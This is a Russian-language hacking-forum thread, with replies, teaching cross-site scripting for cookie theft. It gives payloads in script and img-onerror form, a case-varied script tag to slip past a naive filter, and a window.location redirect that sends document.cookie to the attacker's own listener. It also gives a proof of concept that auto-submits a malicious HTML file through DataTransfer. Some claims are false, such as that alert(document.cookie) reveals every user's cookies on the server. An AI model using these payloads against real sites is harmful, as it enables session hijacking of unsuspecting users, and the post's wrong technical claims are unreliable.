Интересно XSS, или как получить халявные cookie Ч1.

9

9779

XSS, или как получить халявные cookie
1623090620566.png
XSS - опаснейшая уязвимость веб приложений по мнению ведущих it империй и крупных лабораторий кибербезопасности.
qwasp, google, mozilla, apple, kaspersky, и многие другие нанимают целые кибервойска для защиты своих систем.
а нам че, а мы научимся)
на каждом сайте в интернете есть поля ввода, input'ы . и на многих сайтах есть критическая уязвимость, с помощью которой можно задавать js команды прямо в input. пример такой атаки:

<script>alert('9779')</script>

вместо алерта можно вставить любой js код,. но это только начало. если скрипт выше не сработает, попробуем еще один способ. есть у нас условный месcенджер, и он нам до жути не нравится. можно применить такую штуку:

<img src="/" anerror="alert('done')"/>

кстати, строка ввода url тоже считается за input поэтому можно применить вот такую штуку(на момент окончания написания мануала уязвимость была погашенна)

https://otvetkin.info'onerror="alert('done');"

Круто, да? но что нам дают эти алерты?
А теперь поговорим про куки)

alert(document.cookie);

при вводе этого, мы получаем куки всех пользователей на сервере, и нам выбросится уведомление с ними. но можно отсортировать поиск:

JavaScript:
document.cookie = "user=John";
alert(document.cookie);
вы увидите огромное количество куков, я уверяю.
// специальные символы (пробелы), требуется кодирование
let name = "my name";
let value = "John Smith"

// кодирует в my%20name=John%20Smith
document.cookie = encodeURIComponent(name) + '=' + encodeURIComponent(value);

alert(document.cookie); // ...; my%20name=John%20Smith

Надеюсь, что вам понравилась статья, и вы ее дочитали))
Вопросы По статье писать @Pickmoonpeek или @notAHackerRealy в телеграм
Скоро 2 часть!)
 
A

AngelXXXanax

XSS, или как получить халявные cookie
Посмотреть вложение 5442
XSS - опаснейшая уязвимость веб приложений по мнению ведущих it империй и крупных лабораторий кибербезопасности.
qwasp, google, mozilla, apple, kaspersky, и многие другие нанимают целые кибервойска для защиты своих систем.
а нам че, а мы научимся)
на каждом сайте в интернете есть поля ввода, input'ы . и на многих сайтах есть критическая уязвимость, с помощью которой можно задавать js команды прямо в input. пример такой атаки:

<script>alert('9779')</script>

вместо алерта можно вставить любой js код,. но это только начало. если скрипт выше не сработает, попробуем еще один способ. есть у нас условный месcенджер, и он нам до жути не нравится. можно применить такую штуку:

<img src="/" anerror="alert('done')"/>

кстати, строка ввода url тоже считается за input поэтому можно применить вот такую штуку(на момент окончания написания мануала уязвимость была погашенна)

https://otvetkin.info'onerror="alert('done');"

Круто, да? но что нам дают эти алерты?
А теперь поговорим про куки)

alert(document.cookie);

при вводе этого, мы получаем куки всех пользователей на сервере, и нам выбросится уведомление с ними. но можно отсортировать поиск:


JavaScript:
document.cookie = "user=John";
alert(document.cookie);
вы увидите огромное количество куков, я уверяю.
// специальные символы (пробелы), требуется кодирование
let name = "my name";
let value = "John Smith"

// кодирует в my%20name=John%20Smith
document.cookie = encodeURIComponent(name) + '=' + encodeURIComponent(value);

alert(document.cookie); // ...; my%20name=John%20Smith

Надеюсь, что вам понравилась статья, и вы ее дочитали))
Вопросы По статье писать @Pickmoonpeek или @notAHackerRealy в телеграм
Скоро 2 часть!)
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

 $isempty = true;

} else {

 echo '<pre>';
 echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
 echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
photo_2021-06-07_17-16-40.jpg
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
photo_2021-06-07_17-24-08.jpg
 
A

AngelXXXanax

Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

$isempty = true;

} else {

echo '<pre>';
echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
Посмотреть вложение 5443
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
Посмотреть вложение 5444
Ещё интересная тема это Reflected XSS via File Upload. На первый взгляд, кажется простой задачей. Но оказывается, что подсунуть пользователю отправку произвольного файла из браузера без действий пользователя не так уж просто. Нам всегда в таком случае надо чтобы пользователь открыл страницу, после из JS создать на странице форму с уже подставленным файлом, и после перенаправить его на уязвимую страницу вместе с загруженными данными. В этом случае ни как не помогут ни XMLHttpRequest, ни fetch, о которых вы сначала могли подумать. Но! Для содержания файлов объект input имеет поле input.files, которое представляет собой объект FileList. И до какого-то времени мы не могли его изменять (он считался immutable) и создавать кастомные FileList объекты, кроме возможности изменять его через объекты полученные из события DataTransferEvent (Т.е. когда юзер сам перетаскивал файлы на экран). Но в 17 году ребята обнаружили возможность вызывать конструктор объекта DataTransfer , который порождает изменяемый объект FileList, который мы можем наполнить своими произвольными файлами из кода JS. Вот простой пример:
JavaScript:
<!DOCTYPE html>
<html>
<body>
 <form id="" action="https://example.com/convert-file" method="POST" enctype="multipart/form-data">
  <input id="file" type="file" name="file"/>
  "/>
 </form>

 <script>
  class _DataTransfer {
    constructor() {
     return new ClipboardEvent("").clipboardData || new DataTransfer();}
  }

  const input = document.querySelector('input');
  const file = new File(['<img onerror="alert(\'Domain: \'+document.domain+\'" src="x" />'],"name.html",{type:"text/html"})

  const dt = new _DataTransfer();

  dt.items.add(file)

  input.files = dt.files;

  document.forms[0].submit();
 </script>
</body>
</html>
 
N

NothingButAnything

Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

$isempty = true;

} else {

echo '<pre>';
echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
Посмотреть вложение 5443
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
Посмотреть вложение 5444
cпасибо, очень интересно
 
9

9779

Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

$isempty = true;

} else {

echo '<pre>';
echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
Посмотреть вложение 5443
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
Посмотреть вложение 5444
опять ты решил доебаться)))) за штуку с php кстати большое спасибо)) я не знал если честно
 
9

9779

Но в 17 году ребята обнаружили возможность вызывать конструктор объекта DataTransfer , который порождает изменяемый объект FileList, который мы можем наполнить своими произвольными файлами из кода JS. Вот простой пример:
Это имба получается)
 
Y

Yetawesdev

Интересно, благодарочка автору, подробно хотел разобраться)
 
  • Like
Реакции: 9779
S

Slavon65

Это на подобие межсайтегового скрипта?
 
X

x2x_

Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

 $isempty = true;

} else {

 echo '<pre>';
 echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
 echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
Посмотреть вложение 5443
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
Посмотреть вложение 5444
<img src="" onerror="alert(1)"> ....?
 
Похожие темы
Support81 Админ или нет? В Киеве задержан фигурант дела крупнейшего форума XSS Новости в сети 0
Support81 СБУ вместе с французской полицией прикрыли хакерский форум №1 в СНГ XSS.IS Новости в сети 1
Support81 По ситуации с xss.is Свободное общение и флейм 3
Support81 История xss.is(DamageLab) Полезные статьи 1
A Продам уязвимость на temu.com, reflected xss, срочно Уязвимости и взлом 5
Support81 Хакерская элита встревожена: XSS.is продаёт верифицированный доступ к материалам Новости в сети 0
F XSS - Сборник инструментов Уязвимости и взлом 0
G Руководство по применению: как обойти XSS-фильтры Полезные статьи 0
K Уроки по XSS: Урок 3. Контексты внедрения XSS Уязвимости и взлом 0
K Уроки по XSS: Урок 2. Скрытая передача данных, перехват нажатия клавиш, изменение внешнего вида сайта, подцепление на BeEF, фишинг, подсказки обхода ф Уязвимости и взлом 0
K Уроки по XSS: Урок 1. Основы XSS и поиск уязвимых к XSS сайтов Уязвимости и взлом 0
G Skipfish - Сканер безопасности веб-приложений для определения XSS, SQL инъекции, а также Shell инъекции Уязвимости и взлом 0
Admin XSS атаки с помощью Referer'а Уязвимости и взлом 0
I Инжектим скрипт beef используя XSS Полезные статьи 4
Admin Приключения xss векторов в необычных местах Уязвимости и взлом 0
P Golden-Bird.biz XSS Раздачи и сливы 4
Admin Cyber Industries - Активная XSS Уязвимости и взлом 0
Admin Выжимаем максимум пользы от XSS Уязвимости и взлом 1
Admin Hotmail - xss Уязвимости и взлом 0
Admin Mail ru - xss Уязвимости и взлом 1
Support81 Легальный пентест или оружие хакеров? Новости в сети 0
Support81 Хотите читать платные статьи бесплатно? Браузеры Comet или Atlas помогут. И вам ничего не нужно делать Новости в сети 0
onlydockyc Могу помочь вам своим небольшим опытом. Сделаю для вас фотомонтаж, отрисовку или подобные работы в photoshop. Раздачи и сливы 0
Support81 Интересно Хавала — платежная система древних цивилизаций, или что общего у индийского торговца и российского айтишника Финансы - биллинги, банки, кошельки, логи 0
Support81 “Спасатели” или “решалы”? Кому платишь, того и кормишь Новости в сети 0
Support81 Плати или рискуй: Microsoft будет брать плату за обновления Windows Новости в сети 0
K Приму в дар или куплю базы данных, архивные сканы, цифровые фото метрических церковных книг Курской, Белгородской, Харьковской губерний любых годов OSINT 0
Support81 Хактивизм или шпионаж: кто на самом деле отключает воду и свет в городах Новости в сети 0
Support81 Таиланд: цифровой контроль или кибербуллинг от власти Новости в сети 0
Support81 «Плати или я звоню Сноудену»: вымогатели нашли новую тактику шантажа Новости в сети 0
Support81 "Чудо-решение" или маркетинг: как Google создает иллюзию объективности для продвижения технологий Новости в сети 0
Support81 Оптимизация или шпионаж: приложения для очистки памяти сливают информацию Новости в сети 0
Support81 Платить или рисковать: Windows 10 ставит пользователей перед непростым выбором Новости в сети 0
Support81 Gorilla Tag: режим «бога» в VR-мире или билет в киберхаос Новости в сети 0
Support81 Решение Верховного Суда или поддержка Трампа: что определит судьбу TikTok? Новости в сети 0
Support81 Архив или троянский конь? критическая уязвимость в 7-ZIP угрожает миллионам устройств Новости в сети 0
Support81 Надзор или защита: Белый дом поддержит глобальный контроль киберпространства Новости в сети 0
Support81 Интернет без истории: случайность или спланированная акция? Новости в сети 0
Support81 Согласие или штраф: США устанавливают правила шпионажа за сотрудниками Новости в сети 0
Support81 Новый киберпреступник или очередной фейк? Разбираем Hikki-Chan Новости в сети 1
Support81 Tails: гарантия анонимности или иллюзия безопасности? Новости в сети 0
Support81 Анализ Telegram: Защищенный мессенджер или опасное заблуждение? Новости в сети 0
Support81 Роскошное авто или троян? Хакеры из APT28 играют на ваших желаниях Новости в сети 0
Support81 Глобальный цифровой договор: благие намерения или путь к цензуре? Новости в сети 0
Support81 Маленькие коробочки или почему мы любим 7547/TCP Новости в сети 0
Support81 Роaring Kitty – легенда или аферист: Microsoft India втянута в мошенническую схему Новости в сети 0
Support81 Хорошев или не Хорошев? Могло ли ФБР ошибиться, связав мужчину с вымогательской империей LockBit Новости в сети 0
B Ищешь прокси или соксы ? Свободное общение и флейм 0
Support81 LockBit или DragonForce? Кибератака на Палау привела IT-специалистов в замешательство Новости в сети 0
Support81 Разведка за кадром, или Аквариум спецслужб Новости в сети 0

Название темы